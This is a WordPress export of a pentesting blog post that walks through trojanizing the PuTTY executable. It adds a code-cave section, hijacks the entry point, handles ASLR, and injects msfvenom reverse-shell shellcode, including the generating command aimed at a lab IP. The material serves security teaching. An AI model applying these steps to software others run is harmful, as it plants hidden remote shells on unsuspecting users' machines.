{"id":7384,"date":"2018-06-19T12:44:15","date_gmt":"2018-06-19T10:44:15","guid":{"rendered":"https:\/\/hansesecure.de\/2018\/06\/backdooring-pe-file-with-aslr\/"},"modified":"2025-01-07T07:58:08","modified_gmt":"2025-01-07T06:58:08","slug":"backdooring-pe-file-with-aslr","status":"publish","type":"post","link":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/","title":{"rendered":"Backdooring PE-File (with ASLR)"},"content":{"rendered":"<p>Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdoor a PE file, in this case the putty client. I used the following software setup:<\/p>\n<ul>\n<li>Windows 10 Pro 32 bit<\/li>\n<li>Putty<\/li>\n<li>Stud_PE<\/li>\n<li>Immunity debugger<\/li>\n<\/ul>\n<p>Before we get our hands into assembly, I want to explain what we will do.<\/p>\n<p>We will add a section header named .evil to our file and hijack the file&#8217;s execution flow. At the entry point we will redirect the execution to our shellcode, and after our shell has been spawned the ordinary application continues running (putty starts).<\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter wp-image-965\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg\" alt=\"\" width=\"300\" height=\"439\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_changed.jpg\"><img decoding=\"async\" class=\"aligncenter wp-image-967\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_changed-164x300.jpg\" alt=\"\" width=\"300\" height=\"550\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/flow_orign.jpg\"><img decoding=\"async\" class=\"size-medium wp-image-968 aligncenter\"
src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/flow_orign-300x271.jpg\" alt=\"\" width=\"300\" height=\"271\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/flow_changed.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-969 aligncenter\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/flow_changed-300x265.jpg\" alt=\"\" width=\"300\" height=\"265\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>#0x01 Adding Section<\/h2>\n<p>At first we are going to add our new section .evil to our file through Stud_PE. The following pictures are pretty self-explanatory \ud83d\ude09<\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-970\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_01-300x217.jpg\" alt=\"\" width=\"300\" height=\"217\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_02.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-971\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_02-300x272.jpg\" alt=\"\" width=\"300\" height=\"272\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>I chose a section size of 1500 bytes, which is filled with null bytes.
That&#8217;s more than enough for our shellcode.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_03.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-972\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_03-300x219.jpg\" alt=\"\" width=\"400\" height=\"292\"><\/a><\/p>\n<p>After saving the file and loading it into Immunity you can see the differences between the two files (the new section .evil has appeared).<\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/sections_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-974\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/sections_01-300x105.jpg\" alt=\"\" width=\"400\" height=\"141\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/sections_02.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-975\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/sections_02-300x112.jpg\" alt=\"\" width=\"400\" height=\"150\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>And if you look at the address of .evil you will see the following (our predefined null bytes) -&gt; Great! \ud83d\ude09<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/dump_section.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-973\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/dump_section-300x161.jpg\" alt=\"\" width=\"400\" height=\"215\"><\/a><\/p>\n<p>While checking our new section you may have noticed that the addresses have slightly changed.
The last 4 hex digits are always zero, but the first 4 change with every reload of the file.<\/p>\n<p><b>00FB0000<\/b> &lt;-&gt; <b>00250000<\/b><\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-976\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_01-300x106.jpg\" alt=\"\" width=\"400\" height=\"141\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_02.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-977\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_02-300x112.jpg\" alt=\"\" width=\"400\" height=\"150\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>That&#8217;s ASLR, a protection the kernel applies when it maps the image; you can find more information about this countermeasure <a href=\"https:\/\/en.wikipedia.org\/wiki\/Address_space_layout_randomization\" target=\"_blank\" rel=\"noopener noreferrer\">here<\/a>. This means some more work, but it isn&#8217;t a problem (more on that later).<\/p>\n<p>&nbsp;<\/p>\n<h2>#0x02 Hijack Execution Flow<\/h2>\n<p>Now we are looking at the entry point of our file in Immunity. The first instruction at 0x002B7FD6 is a call instruction. We are going to change the first instructions to jump into our code cave (.evil).
Before changing any assembly instruction, copy the &#8216;old&#8217; instructions to a text file, because we are going to resume the application flow after executing our shellcode.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_instructions.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-978\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_instructions-300x85.jpg\" alt=\"\" width=\"400\" height=\"114\"><\/a><\/p>\n<p>Mark the first instruction and type &#8220;jmp [address of .evil]&#8221;, in my case &#8220;jmp 0x002E3000&#8221;. After hitting enter you will see the following:<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/change_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-979\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/change_01-300x47.jpg\" alt=\"\" width=\"400\" height=\"62\"><\/a><\/p>\n<p>Save the changes to a new file and open it in Immunity.<\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-980\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_01-300x268.jpg\" alt=\"\" width=\"400\" height=\"358\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_02.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-981\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_02-300x176.jpg\" alt=\"\" width=\"400\" height=\"235\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>Now we single-step the first instruction with F7 and land in our code cave of null bytes at the .evil address.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/jmp.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-983\"
src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/jmp-300x151.jpg\" alt=\"\" width=\"400\" height=\"201\"><\/a><\/p>\n<p>For testing purposes we replace the null bytes with nops. To do so, just mark all the null bytes of the code cave and do the following:<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/nops.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-985\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/nops-300x91.jpg\" alt=\"\" width=\"400\" height=\"121\"><\/a><\/p>\n<p>We save the state of our registers on top of the stack with the instructions pushad and pushfd.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/10\/register_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-1034 aligncenter\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/10\/register_01-300x48.jpg\" alt=\"\" width=\"400\" height=\"63\"><\/a><\/p>\n<p>At the end of our code cave we restore our register states with popfd and popad.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/register_02.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-987\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/register_02-300x132.jpg\" alt=\"\" width=\"400\" height=\"176\"><\/a><\/p>\n<p>So far no problems (hopefully). Now we do some math to deal with the ASLR protection.<\/p>\n<p>We want to restore all overwritten instructions at the end of our code cave and jump right back into the &#8220;old&#8221; execution flow. If you look at the entry point of our file, you will see that only the call instruction is missing. Without ASLR enabled we could use the saved address from our text file, for example &#8220;call 0x002B8265&#8221;, but you see that the address of the second instruction &#8220;jmp 0x002B7E6E&#8221; has also changed&#8230; ASLR Hurray! \ud83d\ude09<\/p>\n<p>What now?
Only the image base changes under ASLR; the distance between two addresses inside the image stays the same. So we have to determine the offset between the old addresses and apply it to the new base to calculate the target of the overwritten call instruction. Instead of trying to explain the several locations, addresses and relations in words, I try to show them in the following pictures (if this isn&#8217;t enough, please tell me via <a href=\"https:\/\/twitter.com\/HanseSecure\" target=\"_blank\" rel=\"noopener noreferrer\">twitter<\/a> and I will add text sections).<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_03.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-988\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_03-300x78.jpg\" alt=\"\" width=\"400\" height=\"105\"><\/a><\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_04.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-989\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_04-300x92.jpg\" alt=\"\" width=\"400\" height=\"123\"><\/a><\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_05.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-991\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_05-300x181.jpg\" alt=\"\" width=\"400\" height=\"242\"><\/a> <a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_06.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-992\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_06-300x150.jpg\" alt=\"\" width=\"400\" height=\"200\"><\/a><\/p>\n<p>In the end we got the &#8220;new&#8221; address for our overwritten call instruction, which is 0x13F8265.
We place this call instruction right behind the restored registers (popfd, popad).<\/p>\n<p>Now we only need to jmp to the next ordinary instruction at the entry point via &#8220;jmp 0x01067FD8&#8221; and the execution will flow.<\/p>\n<h2>#0x03 Inject shellcode<\/h2>\n<p>Choose your favourite shellcode or generate a new one. I used the following command: <code>msfvenom -p windows\/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex<\/code>. Then use the binary paste function of Immunity to replace some of our nops with the shellcode.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/msfvenom.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-994\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/msfvenom-300x80.jpg\" alt=\"\" width=\"400\" height=\"107\"><\/a><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/inject.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-993\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/inject-300x147.jpg\" alt=\"\" width=\"400\" height=\"196\"><\/a><\/p>\n<p>Save the file and voila, you successfully backdoored a PE file!<\/p>\n<p>Ok, just one thing is missing.
The msfvenom shellcode calls the WaitForSingleObject function, and with the default values this blocks the application from continuing until the shell is closed.<\/p>\n<p>To solve this, replace the &#8220;DEC ESI&#8221; instruction at the end of the shellcode with a nop (the decrement turns the timeout argument into INFINITE; without it the wait returns immediately).<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/fixed_shellcode.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-995\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/fixed_shellcode-300x50.jpg\" alt=\"\" width=\"400\" height=\"67\"><\/a><\/p>\n<p>&nbsp;<\/p>\n<h2>#0x04 PoC<\/h2>\n<p>Start your listener and fire up the application.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/PoC.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-996\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/PoC-300x151.jpg\" alt=\"\" width=\"400\" height=\"201\"><\/a><\/p>\n<p>Thanks for reading and if you like this post, check my&nbsp;<a href=\"https:\/\/twitter.com\/HanseSecure\" target=\"_blank\" rel=\"noopener noreferrer\">twitter<\/a>&nbsp;account please! xD<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdoor a PE file, in this case the putty client.
I used the following software setup: Windows 10 Pro 32 bit Putty Stud_PE Immunity debugger Before we are getting our hands into assembly, i want to [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[257],"tags":[266],"class_list":["post-7384","post","type-post","status-publish","format-standard","hentry","category-deep-dive-techniques","tag-migration-en"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Backdooring PE-File (with ASLR) &#8211; HanseSecure GmbH<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Backdooring PE-File (with ASLR) &#8211; HanseSecure GmbH\" \/>\n<meta property=\"og:description\" content=\"Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdooring a PE file, in this case the putty client. 
I used the following software setup: Windows 10 Pro 32 bit Putty Stud_PE Immunity debugger Before we are getting our hands into assembly, i want to [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/\" \/>\n<meta property=\"og:site_name\" content=\"HanseSecure GmbH\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/hansesecure\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-19T10:44:15+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-01-07T06:58:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg\" \/>\n<meta name=\"author\" content=\"HanseSecure\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberWarship\" \/>\n<meta name=\"twitter:site\" content=\"@CyberWarship\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"HanseSecure\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/\"},\"author\":{\"name\":\"HanseSecure\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#\\\/schema\\\/person\\\/6ec6ef4887ff2fc97a14f1a7f390f593\"},\"headline\":\"Backdooring PE-File (with ASLR)\",\"datePublished\":\"2018-06-19T10:44:15+00:00\",\"dateModified\":\"2025-01-07T06:58:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/\"},\"wordCount\":776,\"publisher\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hansesecure.de\\\/wp-banane\\\/uploads\\\/2018\\\/06\\\/stack_orign-205x300.jpg\",\"keywords\":[\"Migration\"],\"articleSection\":[\"Deep Dive Techniques\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/\",\"url\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/\",\"name\":\"Backdooring PE-File (with ASLR) &#8211; HanseSecure 
GmbH\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hansesecure.de\\\/wp-banane\\\/uploads\\\/2018\\\/06\\\/stack_orign-205x300.jpg\",\"datePublished\":\"2018-06-19T10:44:15+00:00\",\"dateModified\":\"2025-01-07T06:58:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#primaryimage\",\"url\":\"https:\\\/\\\/hansesecure.de\\\/wp-banane\\\/uploads\\\/2018\\\/06\\\/stack_orign-205x300.jpg\",\"contentUrl\":\"https:\\\/\\\/hansesecure.de\\\/wp-banane\\\/uploads\\\/2018\\\/06\\\/stack_orign-205x300.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Backdooring PE-File (with ASLR)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/\",\"name\":\"HanseSecure GmbH\",\"description\":\"Choose the 
Intruder\",\"publisher\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#organization\",\"name\":\"HanseSecure GmbH\",\"url\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/hansesecure.de\\\/wp-content\\\/uploads\\\/2023\\\/05\\\/cropped-000-LOGO-intensiv-schwarz-rot-HanseSecure_LOGO_CTI_Vektor_rotes_H11806.png\",\"contentUrl\":\"https:\\\/\\\/hansesecure.de\\\/wp-content\\\/uploads\\\/2023\\\/05\\\/cropped-000-LOGO-intensiv-schwarz-rot-HanseSecure_LOGO_CTI_Vektor_rotes_H11806.png\",\"width\":512,\"height\":512,\"caption\":\"HanseSecure 
GmbH\"},\"image\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/facebook.com\\\/hansesecure\",\"https:\\\/\\\/x.com\\\/CyberWarship\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/hansesecure\",\"https:\\\/\\\/www.youtube.com\\\/channel\\\/UCAABbKOA_stDFkEKS3MSF7Q\",\"https:\\\/\\\/www.instagram.com\\\/hansesecure\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#\\\/schema\\\/person\\\/6ec6ef4887ff2fc97a14f1a7f390f593\",\"name\":\"HanseSecure\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g\",\"caption\":\"HanseSecure\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Backdooring PE-File (with ASLR) &#8211; HanseSecure GmbH","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/","og_locale":"en_US","og_type":"article","og_title":"Backdooring PE-File (with ASLR) &#8211; HanseSecure GmbH","og_description":"Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdooring a PE file, in this case the putty client. 
I used the following software setup: Windows 10 Pro 32 bit Putty Stud_PE Immunity debugger Before we are getting our hands into assembly, i want to [&hellip;]","og_url":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/","og_site_name":"HanseSecure GmbH","article_publisher":"https:\/\/facebook.com\/hansesecure","article_published_time":"2018-06-19T10:44:15+00:00","article_modified_time":"2025-01-07T06:58:08+00:00","og_image":[{"url":"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg","type":"","width":"","height":""}],"author":"HanseSecure","twitter_card":"summary_large_image","twitter_creator":"@CyberWarship","twitter_site":"@CyberWarship","twitter_misc":{"Written by":"HanseSecure","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#article","isPartOf":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/"},"author":{"name":"HanseSecure","@id":"https:\/\/hansesecure.de\/en\/#\/schema\/person\/6ec6ef4887ff2fc97a14f1a7f390f593"},"headline":"Backdooring PE-File (with ASLR)","datePublished":"2018-06-19T10:44:15+00:00","dateModified":"2025-01-07T06:58:08+00:00","mainEntityOfPage":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/"},"wordCount":776,"publisher":{"@id":"https:\/\/hansesecure.de\/en\/#organization"},"image":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#primaryimage"},"thumbnailUrl":"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg","keywords":["Migration"],"articleSection":["Deep Dive Techniques"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/","url":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/","name":"Backdooring PE-File (with ASLR) &#8211; HanseSecure 
GmbH","isPartOf":{"@id":"https:\/\/hansesecure.de\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#primaryimage"},"image":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#primaryimage"},"thumbnailUrl":"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg","datePublished":"2018-06-19T10:44:15+00:00","dateModified":"2025-01-07T06:58:08+00:00","breadcrumb":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#primaryimage","url":"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg","contentUrl":"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/hansesecure.de\/en\/"},{"@type":"ListItem","position":2,"name":"Backdooring PE-File (with ASLR)"}]},{"@type":"WebSite","@id":"https:\/\/hansesecure.de\/en\/#website","url":"https:\/\/hansesecure.de\/en\/","name":"HanseSecure GmbH","description":"Choose the Intruder","publisher":{"@id":"https:\/\/hansesecure.de\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hansesecure.de\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hansesecure.de\/en\/#organization","name":"HanseSecure 
